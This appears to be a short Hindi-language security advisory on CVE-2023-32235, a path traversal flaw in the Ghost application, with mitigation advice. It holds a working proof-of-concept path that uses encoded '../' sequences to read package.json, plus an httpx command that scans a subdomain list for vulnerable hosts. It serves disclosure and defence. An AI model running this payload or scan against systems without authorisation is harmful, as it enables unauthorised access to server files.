
एक Directory Traversal हमला (जिसे path traversal भी कहा जाता है) का उद्देश्य उन फ़ाइलों और निर्देशिकाओं तक पहुंचना है जो इच्छित फ़ोल्डर के बाहर संग्रहीत हैं।
Ghost एप्लिकेशन एक पथ ट्रैवर्सल कमजोरी के प्रति संवेदनशील है, जिसे CVE-2023-32235 के रूप में पहचाना गया है। यह कमजोरी एक हमलावर को "package.json" फ़ाइल पथ में हेरफेर करके इच्छित निर्देशिका के बाहर के संवेदनशील फ़ाइलों तक पहुँचने की अनुमति देती है।
निम्नलिखित प्रूफ ऑफ कॉन्सेप्ट पथ ट्रैवर्सल कमजोरी को प्रदर्शित करता है:
{{base-uri}}/assets/built%2F..%2F..%2F/package.json
httpx टूल का उपयोग करके कमजोरी का परीक्षण करने के लिए निम्नलिखित कमांड निष्पादित करें:
httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200
इस कमजोरी के सफल शोषण से लक्ष्य सर्वर पर संवेदनशील फ़ाइलों तक अनधिकृत पहुँच हो सकती है। इससे गोपनीय जानकारी का रिसाव, उपयोगकर्ता की गोपनीयता से समझौता, और प्रभावित एप्लिकेशन की सुरक्षा को कमजोर किया जा सकता है।
इस कमजोरी को कम करने के लिए, फ़ाइल पथों को संभालते समय मजबूत इनपुट सत्यापन लागू करने और उपयोगकर्ता द्वारा प्रदत्त डेटा को स्वच्छ करने की सिफारिश की जाती है। डेवलपर्स को फ़ाइल पथों के लिए सीधे उपयोगकर्ता इनपुट स्वीकार करने से बचना चाहिए और इसके बजाय स्वीकार्य पथों की सफेदसूची बनाने या सुरक्षा-केंद्रित पुस्तकालयों का उपयोग करने जैसे सुरक्षित विकल्पों का उपयोग करना चाहिए।